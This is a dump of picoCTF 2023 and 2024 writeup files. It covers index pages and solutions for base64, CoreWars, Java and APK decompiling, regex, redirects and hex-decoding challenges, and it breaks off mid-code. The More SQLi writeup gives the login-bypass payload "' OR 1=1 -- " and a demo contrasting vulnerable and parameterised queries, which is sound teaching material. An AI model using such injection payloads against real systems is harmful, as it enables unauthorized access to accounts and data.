https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2023/Forensics/StegSolve_MSB_data_extraction.png

--------------------------------------------------------------------------------
/picoCTF_2023/General_Skills/README.md:
--------------------------------------------------------------------------------
# General Skills Challenges

## Easy General Skills Challenges

- [repetitions](repetitions.md)

## Medium General Skills Challenges

- [chrono](chrono.md)
- [Permissions](Permissions.md)
- [Special](Special.md)
- [Specialer](Specialer.md)
- [useless](useless.md)

--------------------------------------------------------------------------------
/picoCTF_2023/General_Skills/repetitions.md:
--------------------------------------------------------------------------------
# repetitions

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Easy
Tags: picoCTF 2023, General Skills, base64
Author: THEONESTE BYAGUTANGAZA

Description:
Can you make sense of this file?

Download the file here.

Hints:
1. Multiple decoding is always good.
```

Challenge link: [https://play.picoctf.org/practice/challenge/371](https://play.picoctf.org/practice/challenge/371)

## Solution

One of the tags already gave it away. The contents of the file are [base64 encoded data](https://en.wikipedia.org/wiki/Base64).

Otherwise, a good indicator of base64 encoded data is a string ending with one or two equal signs ('=') and
containing nothing but letters and numbers (with three exceptions: '+', '/', and '=').
The '=' is padding in base64 encoding.

The contents of the file are

```text
VmpGU1EyRXlUWGxTYmxKVVYwZFNWbGxyV21GV1JteDBUbFpPYWxKdFVsaFpWVlUxWVZaS1ZWWnVh
RmRXZWtab1dWWmtSMk5yTlZWWApiVVpUVm10d1VWZFdVa2RpYlZaWFZtNVdVZ3BpU0VKeldWUkNk
MlZXVlhoWGJYQk9VbFJXU0ZkcVRuTldaM0JZVWpGS2VWWkdaSGRXCk1sWnpWV3hhVm1KRk5XOVVW
VkpEVGxaYVdFMVhSbFZhTTBKUFdXdGtlbVF4V2tkWGJYUllDbUY2UWpSWmEyaFRWakpHZEdWRlZs
aGkKYlRrelZERldUMkpzUWxWTlJYTkxDZz09Cg==
```

Both the challenge name and the hint suggest that we need to do a number of decoding rounds to get our flag.
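As an added example (not the writeup's own script), here is a multi-layer base64 decoder written for the failure modes a simple "decode until the marker appears" loop does not handle: it bounds the number of layers, strips the line breaks that the `base64` tool inserts (visible in the file above), and decodes strictly with `validate=True`, so that running out of base64 layers without finding a flag is reported instead of raising mid-loop. The encoded sample is constructed inside the block; the challenge's `enc_flag` is not used.

```python
import base64
import binascii
import re

FLAG_RE = re.compile(rb"picoCTF\{[^}]*\}")
MAX_LAYERS = 32  # hard stop so malformed or unexpected input cannot spin forever


def peel_base64(data: bytes, max_layers: int = MAX_LAYERS):
    """Strip base64 layers until a flag appears.

    Returns (flag, layers_removed), or (None, layers_removed) when the data
    stops being valid base64 (or the layer limit is hit) before a flag shows up.
    """
    current = data
    for layer in range(max_layers + 1):
        match = FLAG_RE.search(current)
        if match:
            return match.group(0).decode("ascii"), layer
        # Remove whitespace/newlines first: the encoder wraps at 76 columns, and
        # strict decoding would otherwise reject the line breaks.
        compact = b"".join(current.split())
        try:
            # validate=True rejects characters outside the base64 alphabet and bad
            # padding; that is the signal that there is no further layer.
            current = base64.b64decode(compact, validate=True)
        except (binascii.Error, ValueError):
            return None, layer
    return None, max_layers


def wrap_base64(data: bytes, layers: int) -> bytes:
    """Constructed-sample builder: apply base64 `layers` times, like the challenge file."""
    for _ in range(layers):
        data = base64.b64encode(data)
    return data


# Constructed sample with a placeholder flag (not the real one), five layers deep.
SAMPLE = wrap_base64(b"picoCTF{constructed_sample}\n", 5)

if __name__ == "__main__":
    flag, layers = peel_base64(SAMPLE)
    print("flag: %s (after %d layers)" % (flag, layers))
```

Searching for the full `picoCTF{...}` pattern rather than the bare prefix also avoids stopping one layer too early if the prefix happens to appear by chance in an intermediate layer.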

We probably could get away with manually applying a number of ['From Base64' recipes in CyberChef](https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)), but let's write a little Python script called `solve.py` instead that automatically finds the flag under any number of base64 layers.

```python
#!/usr/bin/python

import base64

# Read the encoded flag
with open("enc_flag", 'r') as fh:
    enc_flag = fh.read()

# Keep decoding one base64 layer at a time until the flag marker shows up
while ('picoCTF' not in enc_flag):
    enc_flag = base64.b64decode(enc_flag).decode('ascii')

print(enc_flag)
```

Then make the script executable and run it

```bash
┌──(kali㉿kali)-[/picoCTF/picoCTF_2023/General_Skills/repetitions]
└─$ chmod +x solve.py

┌──(kali㉿kali)-[/picoCTF/picoCTF_2023/General_Skills/repetitions]
└─$ ./solve.py
picoCTF{}
```

For additional information, please see the references below.

## References

- [Base64 - Wikipedia](https://en.wikipedia.org/wiki/Base64)
- [base64 module - Python](https://docs.python.org/3/library/base64.html)
- [CyberChef - Homepage](https://gchq.github.io/CyberChef/)
- [python - Linux manual page](https://linux.die.net/man/1/python)
- [Python (programming language) - Wikipedia](https://en.wikipedia.org/wiki/Python_(programming_language))

--------------------------------------------------------------------------------
/picoCTF_2023/README.md:
--------------------------------------------------------------------------------
# picoCTF 2023 Challenges

## Binary Exploitation Challenges

### Medium Binary Exploitation Challenges

- [babygame01](Binary_Exploitation/babygame01.md)
- [hijacking](Binary_Exploitation/hijacking.md)
- [two-sum](Binary_Exploitation/two-sum.md)
- [VNE](Binary_Exploitation/VNE.md)

### Hard Binary Exploitation Challenges

- [tic-tac](Binary_Exploitation/tic-tac.md)

## Cryptography Challenges

### Medium Cryptography Challenges

- [HideToSee](Cryptography/HideToSee.md)
- [ReadMyCert](Cryptography/ReadMyCert.md)
- [rotation](Cryptography/rotation.md)

## Forensics Challenges

### Medium Forensics Challenges

- [FindAndOpen](Forensics/FindAndOpen.md)
- [hideme](Forensics/hideme.md)
- [MSB](Forensics/MSB.md)
- [PcapPoisoning](Forensics/PcapPoisoning.md)

### Hard Forensics Challenges

- [Invisible WORDs](Forensics/Invisible_WORDs.md)

## General Skills Challenges

### Easy General Skills Challenges

- [repetitions](General_Skills/repetitions.md)

### Medium General Skills Challenges

- [chrono](General_Skills/chrono.md)
- [Permissions](General_Skills/Permissions.md)
- [Special](General_Skills/Special.md)
- [Specialer](General_Skills/Specialer.md)
- [useless](General_Skills/useless.md)

## Reverse Engineering Challenges

### Medium Reverse Engineering Challenges

- [Ready Gladiator 0](Reverse_Engineering/Ready_Gladiator_0.md)
- [Ready Gladiator 1](Reverse_Engineering/Ready_Gladiator_1.md)
- [Ready Gladiator 2](Reverse_Engineering/Ready_Gladiator_2.md)
- [Reverse](Reverse_Engineering/Reverse.md)
- [Safe Opener 2](Reverse_Engineering/Safe_Opener_2.md)
- [timer](Reverse_Engineering/timer.md)
- [Virtual Machine 0](Reverse_Engineering/Virtual_Machine_0.md)

## Web Exploitation Challenges

### Medium Web Exploitation Challenges

- [findme](Web_Exploitation/findme.md)
- [MatchTheRegex](Web_Exploitation/MatchTheRegex.md)
- [More SQLi](Web_Exploitation/More_SQLi.md)
- [SOAP](Web_Exploitation/SOAP.md)

--------------------------------------------------------------------------------
/picoCTF_2023/Reverse_Engineering/README.md:
--------------------------------------------------------------------------------
# Reverse Engineering Challenges

## Medium Reverse Engineering Challenges

- [Ready Gladiator 0](Ready_Gladiator_0.md)
- [Ready Gladiator 1](Ready_Gladiator_1.md)
- [Ready Gladiator 2](Ready_Gladiator_2.md)
- [Reverse](Reverse.md)
- [Safe Opener 2](Safe_Opener_2.md)
- [timer](timer.md)
- [Virtual Machine 0](Virtual_Machine_0.md)

--------------------------------------------------------------------------------
/picoCTF_2023/Reverse_Engineering/Ready_Gladiator_1.md:
--------------------------------------------------------------------------------
# Ready Gladiator 1

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2023, Reverse Engineering, CoreWars
Author: LT 'SYREAL' JONES

Description:
Can you make a CoreWars warrior that wins?
Your opponent is the Imp. The source is available here.

If you wanted to pit the Imp against himself, you could download the Imp and connect to the CoreWars server like this:
nc saturn.picoctf.net 62741 < imp.red

To get the flag, you must beat the Imp at least once out of the many rounds.

Hints:
1. You may be able to find a viable warrior in beginner docs
```

Challenge link: [https://play.picoctf.org/practice/challenge/369](https://play.picoctf.org/practice/challenge/369)

## Solution

This is a continuation of the [previous challenge](Ready_Gladiator_0.md) and I started off by re-reading the [beginner's docs](https://corewars.org/docs/guide.html) in hope of finding a CoreWars warrior as the hint suggested. I wasn't very keen on coding my own warrior.

### Enter the dwarf warrior

I found a warrior called 'The Dwarf' and decided to try it out as an opponent to 'The Imp'

```text
;redcode
;name The Dwarf
;assert 1
add #4, 3
mov 2, @2
jmp -2
dat #0, #0
end
```

### Get the flag

Then I sent the dwarf into battle

```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2023/Reverse_Engineering/Ready_Gladiator_1]
└─$ nc saturn.picoctf.net 62741 < the_dwarf.red
;redcode
;name The Dwarf
;assert 1
add #4, 3
mov 2, @2
jmp -2
dat #0, #0
end
Submit your warrior: (enter 'end' when done)

Warrior1:
;redcode
;name The Dwarf
;assert 1
add #4, 3
mov 2, @2
jmp -2
dat #0, #0
end

Rounds: 100
Warrior 1 wins: 26
Warrior 2 wins: 0
Ties: 74
You did it!
picoCTF{}
```

It won 26 times so I got the flag.

For additional information, please see the references below.

## References

- [CoreWars](https://corewars.org/)
- [Beginner's guide to Redcode](https://corewars.org/docs/guide.html)

--------------------------------------------------------------------------------
/picoCTF_2023/Reverse_Engineering/Safe_Opener_2.md:
--------------------------------------------------------------------------------
# Safe Opener 2

- [Challenge information](#challenge-information)
- [Grepping for the flag solution](#grepping-for-the-flag-solution)
- [Decompiling with JD-GUI solution](#decompiling-with-jd-gui-solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2023, Reverse Engineering
Author: MUBARAK MIKAIL

Description:
What can you do with this file?

I forgot the key to my safe but this file is supposed to help me with retrieving the lost key.
Can you help me unlock my safe?

Hints:
1. Download and try to decompile the file.
```

Challenge link: [https://play.picoctf.org/practice/challenge/375](https://play.picoctf.org/practice/challenge/375)

There are several ways to solve this challenge. Here are two solutions presented in increasing difficulty.

## Grepping for the flag solution

On easy challenges it's always recommended to search for the flag in plain text with `strings` and `grep`.

```bash
┌──(kali㉿kali)-[/picoCTF/picoCTF_2023/Reverse_Engineering/Safe_Opener_2]
└─$ strings -a -n 8 SafeOpener.class | grep picoCTF
,picoCTF{}
```

## Decompiling with JD-GUI solution

A more sophisticated solution is to decompile the file in [JD-GUI](https://github.com/java-decompiler/jd-gui) and study the code.

You find the flag hard-coded in the `openSafe` function (it's redacted here). A string constant compiled into a class file is exactly what `strings` picked up above.

```java
public static boolean openSafe(String password)
{
    String encodedkey = "picoCTF{}";
    if (password.equals(encodedkey))
    {
        System.out.println("Sesame open");
        return true;
    }
    System.out.println("Password is incorrect\n");
    return false;
}
```

For additional information, please see the references below.

## References

- [grep - Linux manual page](https://man7.org/linux/man-pages/man1/grep.1.html)
- [JD-GUI - GitHub](https://github.com/java-decompiler/jd-gui)
- [String (computer science) - Wikipedia](https://en.wikipedia.org/wiki/String_(computer_science))
- [strings - Linux manual page](https://man7.org/linux/man-pages/man1/strings.1.html)

--------------------------------------------------------------------------------
/picoCTF_2023/Reverse_Engineering/The_Black_Box_in_Blender.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2023/Reverse_Engineering/The_Black_Box_in_Blender.png

--------------------------------------------------------------------------------
/picoCTF_2023/Reverse_Engineering/Virtual_Machine_0.md:
--------------------------------------------------------------------------------
# Virtual Machine 0

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2023, Reverse Engineering, Analog
Author: LT 'SYREAL' JONES

Description:
Can you crack this black box?

We grabbed this design doc from enemy servers: Download.

We know that the rotation of the red axle is input and the rotation of the blue axle is output.
The following input gives the flag as output: Download.

Hints:
1. Rotating the axle that number of times is obviously not feasible.
   Can you model the mathematical relationship between red and blue?
```

Challenge link: [https://play.picoctf.org/practice/challenge/385](https://play.picoctf.org/practice/challenge/385)

## Solution

Unzipping the given Zip file gives you a .dae file, a format I had previously never heard about.
So I googled for a program to open it with and found [Blender](https://www.blender.org/), which is free and open source.

### Physically dismantle the machine

Start Blender.
Then in the `File` menu, choose `Import` and `Collada (.dae)`. Select the `Virtual-Machine-0.dae` file.

Zoom in and you should see the "black box" machine

![The Black Box in Blender](The_Black_Box_in_Blender.png)

Now you need to dismantle the black box by selecting components and moving them away.
The navigation is a bit weird and this takes time.

You need to isolate the red and blue gearwheels well enough to be able to count their number of cogs.

The blue gear has 8 cogs and the red gear has 40 cogs.

### Get the flag

The ratio between the numbers of cogs is 5 (40 / 8 = 5), so every turn of the red (input) axle turns the blue (output) axle 5 times.

Then calculate an assumed hex-encoded flag in Python

```python
>>> input = 39722847074734820757600524178581224432297292490103996089444214757432940313
>>> difference = 5
>>> hex_flag = hex(input * difference)[2:]
>>> bytes.fromhex(hex_flag).decode()
'picoCTF{}'
>>>
```

For additional information, please see the references below.
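As an added example, not the writeup's own code: the same gear-ratio model written as functions, with the two details the REPL session glosses over handled explicitly. The output rotation count is computed as an exact fraction (so a ratio that does not divide evenly is reported instead of silently truncated), and the integer is converted to bytes with `to_bytes` rather than `hex()`, which would drop a leading zero nibble. The sample input is constructed from a placeholder flag, not from the challenge's real input number; the tooth counts 40 and 8 are those given above.

```python
from fractions import Fraction


def gear_ratio(input_teeth: int, output_teeth: int) -> Fraction:
    """Meshed gears: output turns per input turn equals input teeth / output teeth."""
    return Fraction(input_teeth, output_teeth)


def output_turns(input_turns: int, input_teeth: int, output_teeth: int) -> int:
    """Exact number of output-axle rotations; raises if it is not a whole number."""
    turns = input_turns * gear_ratio(input_teeth, output_teeth)
    if turns.denominator != 1:
        raise ValueError("output axle rotation is not a whole number of turns")
    return int(turns)


def decode_turns(turns: int) -> str:
    """Interpret the rotation count as a big-endian byte string (the flag)."""
    length = (turns.bit_length() + 7) // 8
    return turns.to_bytes(length, "big").decode("ascii")


def solve(input_turns: int, input_teeth: int = 40, output_teeth: int = 8) -> str:
    """Red (input) gear with 40 cogs driving the blue (output) gear with 8 cogs."""
    return decode_turns(output_turns(input_turns, input_teeth, output_teeth))


# Constructed sample: a placeholder flag, not the real one. Its integer value is
# divisible by 5 (a big-endian byte string's value mod 5 equals the sum of its
# bytes mod 5, because 256 == 1 mod 5, and these bytes sum to 1640), so the
# "input" rotation count below is exact and solve() recovers the flag.
SAMPLE_FLAG = "picoCTF{gearbox}"
SAMPLE_INPUT = int.from_bytes(SAMPLE_FLAG.encode("ascii"), "big") // 5

if __name__ == "__main__":
    print("input turns :", SAMPLE_INPUT)
    print("output flag :", solve(SAMPLE_INPUT))
```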

## References

- [Blender - Homepage](https://www.blender.org/)
- [python - Linux manual page](https://linux.die.net/man/1/python)
- [Python (programming language) - Wikipedia](https://en.wikipedia.org/wiki/Python_(programming_language))

--------------------------------------------------------------------------------
/picoCTF_2023/Reverse_Engineering/timer.md:
--------------------------------------------------------------------------------
# timer

- [Challenge information](#challenge-information)
- [Grepping for the flag solution](#grepping-for-the-flag-solution)
- [Decompiling with JADX-GUI solution](#decompiling-with-jadx-gui-solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2023, Reverse Engineering, android
Author: MUBARAK MIKAIL

Description:
You will find the flag after analysing this apk

Download here.

Hints:
1. Decompile
2. mobsf or jadx
```

Challenge link: [https://play.picoctf.org/practice/challenge/381](https://play.picoctf.org/practice/challenge/381)

There are several ways to solve this challenge. Here are two solutions presented in increasing difficulty.

## Grepping for the flag solution

APK files are simply Zip files and can be unpacked with a tool such as [7-Zip](https://www.7-zip.org/).
Unpack the [APK file](https://en.wikipedia.org/wiki/Apk_(file_format)) and then just use `grep` recursively on all the unpacked files

```bash
Z:\CTFs\picoCTF\picoCTF_2023\Reverse_Engineering\timer\timer>grep -iR picoCTF *
apktool.yml: versionName: picoCTF{}
smali_classes3/com/example/timer/BuildConfig.smali:.field public static final VERSION_NAME:Ljava/lang/String; = "picoCTF{}"
```

As you can see, the flag was present in two different files: the app's version name in the apktool metadata and the generated `BuildConfig` class that carries the same value.

## Decompiling with JADX-GUI solution

A more sophisticated solution is to decompile the APK file with [Jadx-GUI](https://github.com/skylot/jadx) and study the decompiled code.

Since the APK file contains a lot of files, the fastest way to find the flag is to use the 'Text search' feature.
It is available both in the Navigation menu and as a button on the tool bar.

In this case, searching for `picoCTF` just gives you one hit, in `com.example.timer.BuildConfig`

```java
package com.example.timer;

/* loaded from: classes3.dex */
public final class BuildConfig {
    public static final String APPLICATION_ID = "com.example.timer";
    public static final String BUILD_TYPE = "debug";
    public static final boolean DEBUG = Boolean.parseBoolean("true");
    public static final int VERSION_CODE = 1;
    public static final String VERSION_NAME = "picoCTF{}";
}
```

For additional information, please see the references below.

## References

- [7-Zip - Homepage](https://www.7-zip.org/)
- [apk (file format) - Wikipedia](https://en.wikipedia.org/wiki/Apk_(file_format))
- [Jadx-GUI - GitHub](https://github.com/skylot/jadx)

--------------------------------------------------------------------------------
/picoCTF_2023/Web_Exploitation/MatchTheRegex.md:
--------------------------------------------------------------------------------
# MatchTheRegex

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2023, Web Exploitation
Author: SUNDAY JACOB NWANYIM

Description:
How about trying to match a regular expression

The website is running here.

Hints:
1. Access the webpage and try to match the regular expression associated with the text field
```

Challenge link: [https://play.picoctf.org/practice/challenge/356](https://play.picoctf.org/practice/challenge/356)

## Solution

The challenge name and description tell us that there are [regular expressions](https://en.wikipedia.org/wiki/Regular_expression) (RegEx) involved.

### Checking the web page and source code

Browsing to the web site you see:

- A 'Valid Input' text
- A text input field
- A Submit button

Let's view the source of the web page and especially the `send_request` function

```javascript
function send_request() {
    let val = document.getElementById("name").value;
    // ^p.....F!?
    fetch(`/flag?input=${val}`)
        .then(res => res.text())
        .then(res => {
            const res_json = JSON.parse(res);
            alert(res_json.flag)
            return false;
        })
    return false;
}
```

### Analysis of the regular expression

The comment in the function suggests that the regular expression matched against the input is `^p.....F!?`.

This means that the input should

1. Start with the lowercase letter 'p'
2. Then include any 5 characters ('.' matches any character)
3. Then be followed by the uppercase letter 'F'
4. Then have an optional '!'

Note that the pattern is anchored only at the start (`^`) and not at the end (no `$`), so anything at all may follow.

### Getting the flag

There are lots of different inputs that will match the regex above and print the flag.
These are examples of some of them:

- picoCTF
- picoCTF!
- paaaaaF
- picoCTF is fun

For additional information, please see the references below.
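As an added example (not code from the challenge or the writeup), the regex analysis above can be checked programmatically. The block assumes the server-side check is equivalent to the commented pattern `^p.....F!?` applied with a start-anchored search, and puts it next to a `fullmatch` variant to show why a validation regex that is anchored only at one end accepts trailing input such as `picoCTF is fun`.

```python
import re

# Pattern taken from the comment in send_request(); Python's `re` has the same
# meaning for ^ . ? as JavaScript for this pattern.
PATTERN = re.compile(r"^p.....F!?")


def server_check(value: str) -> bool:
    """Assumed behaviour of the challenge: pattern anchored at the start only."""
    return PATTERN.search(value) is not None


def strict_check(value: str) -> bool:
    """Hardened variant: the whole input must match, nothing before or after."""
    return re.fullmatch(r"p.....F!?", value) is not None


# Constructed cases: input -> (server_check result, strict_check result)
CASES = {
    "picoCTF": (True, True),
    "picoCTF!": (True, True),
    "paaaaaF": (True, True),
    "picoCTF is fun": (True, False),   # trailing text slips past a start-only anchor
    "PicoCTF": (False, False),         # 'p' must be lowercase; no IGNORECASE flag
    "picoCT": (False, False),          # five characters but no 'F' after them
    "xpicoCTF": (False, False),        # ^ forbids any prefix
    "picoctf": (False, False),         # 'f' is not 'F'
}


def run_cases():
    """Evaluate both checks on every case; returns the same shape as CASES."""
    return {s: (server_check(s), strict_check(s)) for s in CASES}


if __name__ == "__main__":
    for s, (loose, strict) in run_cases().items():
        print("%-16r start-anchored=%-5s fullmatch=%s" % (s, loose, strict))
```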

## References

- [JavaScript - Wikipedia](https://en.wikipedia.org/wiki/JavaScript)
- [Regular expressions - Wikipedia](https://en.wikipedia.org/wiki/Regular_expression)

--------------------------------------------------------------------------------
/picoCTF_2023/Web_Exploitation/More_SQLi.md:
--------------------------------------------------------------------------------
# More SQLi

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2023, Web Exploitation, sql
Author: MUBARAK MIKAIL

Description:
Can you find the flag on this website.
Try to find the flag here.

Hints:
1. SQLiLite
```

Challenge link: [https://play.picoctf.org/practice/challenge/358](https://play.picoctf.org/practice/challenge/358)

## Solution

### Analyze the web page

Browse to the web site and we see a login form under the heading `Security Challenge`.

The hint has already told us that we should expect a [SQL injection](https://en.wikipedia.org/wiki/SQL_injection) vulnerability,
but let's try to log in with `admin:admin` and see what happens. The following is returned to us

```text
username: admin
password: admin
SQL query: SELECT id FROM users WHERE password = 'admin' AND username = 'admin'
```

Yes, definitely SQL injection: the page echoes a query in which our input has been pasted straight into the SQL string.

### Log in with SQLi

OK, let's use the SQLi vulnerability by logging in with username `qwerty` and password `' OR 1=1 -- `.
We get a table but no flag visible.

Next, I checked if the flag was hidden in an HTML comment, but no...
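As an added illustration (not code from the challenge), here is the echoed query rebuilt in Python against an in-memory SQLite database, side by side with the parameterised form that the site should have used. The users table and its credentials are constructed for the example; the payload is the one used above. With string formatting, the quote in the password closes the literal and `-- ` comments out the rest of the `WHERE` clause, so the first user row comes back; with bound parameters the same text is just a password that matches nothing.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed users table (sample credentials, not from the challenge)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 's3cret-not-admin')")
    conn.execute("INSERT INTO users (username, password) VALUES ('alice', 'wonderland')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Query built by string formatting, in the shape the challenge page echoes back."""
    query = (f"SELECT id FROM users WHERE password = '{password}' "
             f"AND username = '{username}'")
    return conn.execute(query).fetchone()


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Parameterised query: user input is bound as data and never parsed as SQL."""
    query = "SELECT id FROM users WHERE password = ? AND username = ?"
    return conn.execute(query, (password, username)).fetchone()


# The credentials used in the writeup's login attempt.
PAYLOAD_USER = "qwerty"
PAYLOAD_PASS = "' OR 1=1 -- "


def demo():
    """Run both login functions on the payload and on ordinary credentials."""
    conn = make_db()
    return (
        login_vulnerable(conn, PAYLOAD_USER, PAYLOAD_PASS),   # bypass: first row (id 1)
        login_safe(conn, PAYLOAD_USER, PAYLOAD_PASS),         # no such user: None
        login_safe(conn, "admin", "s3cret-not-admin"),        # real credentials still work
        login_vulnerable(conn, "admin", "wrong"),             # wrong password: None
    )


if __name__ == "__main__":
    print(demo())
```

Echoing the executed query to the client, as this page does, is a second defect on top of the injection: it hands anyone testing the form the exact SQL shape they need, which is why a real application should log such details server-side only.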

### Get the flag

However, when I checked the `HTTP history` in [Burp Suite](https://portswigger.net/burp), which I had running in the background, I finally found the flag in the `POST` response.

![HTTP history in Burp Suite](More_SQLi_in_Burp_Suite.png)

For additional information, please see the references below.

## References

- [Burp Suite - Home page](https://portswigger.net/burp)
- [SQL Injection - OWASP](https://owasp.org/www-community/attacks/SQL_Injection)
- [SQL Injection - PortSwigger](https://portswigger.net/web-security/sql-injection)
- [SQL injection - Wikipedia](https://en.wikipedia.org/wiki/SQL_injection)
- [SQL injection cheat sheet - PortSwigger](https://portswigger.net/web-security/sql-injection/cheat-sheet)

--------------------------------------------------------------------------------
/picoCTF_2023/Web_Exploitation/More_SQLi_in_Burp_Suite.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2023/Web_Exploitation/More_SQLi_in_Burp_Suite.png

--------------------------------------------------------------------------------
/picoCTF_2023/Web_Exploitation/README.md:
--------------------------------------------------------------------------------
# Web Exploitation Challenges

## Medium Web Exploitation Challenges

- [findme](findme.md)
- [MatchTheRegex](MatchTheRegex.md)
- [More SQLi](More_SQLi.md)
- [SOAP](SOAP.md)

--------------------------------------------------------------------------------
/picoCTF_2023/Web_Exploitation/Redirections_in_the_findme_challenge.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2023/Web_Exploitation/Redirections_in_the_findme_challenge.png

--------------------------------------------------------------------------------
/picoCTF_2023/Web_Exploitation/findme.md:
--------------------------------------------------------------------------------
# findme

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2023, Web Exploitation
Author: GEOFFREY NJOGU

Description:
Help us test the form by submiting the username as test and password as test!

The website running here.

Hints:
1. any redirections?
```

Challenge link: [https://play.picoctf.org/practice/challenge/349](https://play.picoctf.org/practice/challenge/349)

## Solution

Browse to the web site, but before you log in start DevTools in your browser (press F12) and navigate to the `Network` tab, as the hint wants us to look for redirections. In the `Network` tab make sure you have the `Preserve Log` option enabled, otherwise the intermediate requests are cleared when the final page loads.

Then log in with `test:test!`.

You will indeed see a number of redirections. [HTTP status codes](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status) in the 3xx range are redirections.

![Redirections when logging in](Redirections_in_the_findme_challenge.png)

One of the `id` parameters ends with two equal signs, so they are both probably base64 encoded. The '=' is padding in base64.

Let's try to decode it to verify

```bash
┌──(kali㉿kali)-[/picoCTF/picoCTF_2023/Web_Explotation/findme]
└─$ echo "cGljb0NURntwcm94aWVzX2Fs" | base64 -d
picoCTF{proxies_al
```

Combine the parameters (in redirect order) and you have the flag.

For additional information, please see the references below.

## References

- [base64 - Linux manual page](https://man7.org/linux/man-pages/man1/base64.1.html)
- [Base64 - Wikipedia](https://en.wikipedia.org/wiki/Base64)
- [echo - Linux manual page](https://man7.org/linux/man-pages/man1/echo.1.html)
- [HTTP status codes](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status)

--------------------------------------------------------------------------------
/picoCTF_2024/Binary_Exploitation/README.md:
--------------------------------------------------------------------------------
# Binary Exploitation Challenges

## Easy Binary Exploitation Challenges

- [format string 0](format_string_0.md)
- [format string 1](format_string_1.md)
- [heap 0](heap_0.md)
- [heap 1](heap_1.md)

## Medium Binary Exploitation Challenges

- [format string 2](format_string_2.md)
- [heap 2](heap_2.md)

--------------------------------------------------------------------------------
/picoCTF_2024/Cryptography/README.md:
--------------------------------------------------------------------------------
# Cryptography Challenges

## Easy Cryptography Challenges

- [Custom encryption](Custom_encryption.md)
- [interencdec](interencdec.md)

## Medium Cryptography Challenges

- [C3](C3.md)

--------------------------------------------------------------------------------
/picoCTF_2024/Forensics/Mob_psycho.md:
--------------------------------------------------------------------------------
# Mob psycho

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2024, Forensics, browser_webshell_solvable, apk
Author: NGIRIMANA SCHADRACK

Description:
Can you handle APKs?

Download the android apk here.

Hints:
1. Did you know you can unzip APK files?
2. Now you have the whole host of shell tools for searching these files.
```

Challenge link: [https://play.picoctf.org/practice/challenge/420](https://play.picoctf.org/practice/challenge/420)

## Solution

### Unpacking and basic analysis

We start by unpacking the [APK file](https://en.wikipedia.org/wiki/Apk_(file_format)) with `unzip`

```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Forensics/Mob_psycho]
└─$ unzip mobpsycho.apk
Archive:  mobpsycho.apk
   creating: res/
   creating: res/anim/
  inflating: res/anim/abc_fade_in.xml
  inflating: res/anim/abc_fade_out.xml
  inflating: res/anim/abc_grow_fade_in_from_bottom.xml
  inflating: res/anim/abc_popup_enter.xml
  inflating: res/anim/abc_popup_exit.xml
<---snip--->
```

Let's be optimistic and `grep` for the flag

```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Forensics/Mob_psycho]
└─$ grep -iR picoCTF *

┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Forensics/Mob_psycho]
└─$ strings mobpsycho.apk | grep flag
res/color/flag.txtUT
res/color/flag.txtUT

┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Forensics/Mob_psycho]
└─$ cat res/color/flag.txt
7069636f4354467b6178386d433052553676655f4e5838356c346178386d436c5f61336562356163327d
```

No plain-text hit, but the file name `flag.txt` shows up in the archive's entry list and its content looks like hex encoding (only the characters 0-9 and a-f, even length).

### Get the flag

Decode with `xxd` like this

```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Forensics/Mob_psycho]
└─$ cat res/color/flag.txt | xxd -r -p
picoCTF{}
```

For additional information, please see the references below.
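Both this writeup and the `timer` one above amount to "treat the APK as a zip and search every entry for the flag", with the twist here that a plain `grep` misses a hex-encoded file. As an added example (not the writeups' own commands), the block below does that search in Python over an APK-like zip constructed in memory: every entry is checked as raw bytes, and entries that consist solely of hex digits are also checked after hex decoding, so it finds both the `apktool.yml`-style plain-text hit and the `res/color/flag.txt`-style hex hit. The file names and flags inside the sample archive are placeholders.

```python
import io
import re
import zipfile

FLAG_RE = re.compile(rb"picoCTF\{[^}]*\}")
HEX_RE = re.compile(rb"^[0-9a-fA-F]+$")


def candidate_views(data: bytes):
    """Yield (label, bytes) views of one entry: the raw bytes, plus a hex-decoded
    view when the whole entry (ignoring whitespace) is an even-length hex string."""
    yield "raw", data
    stripped = b"".join(data.split())
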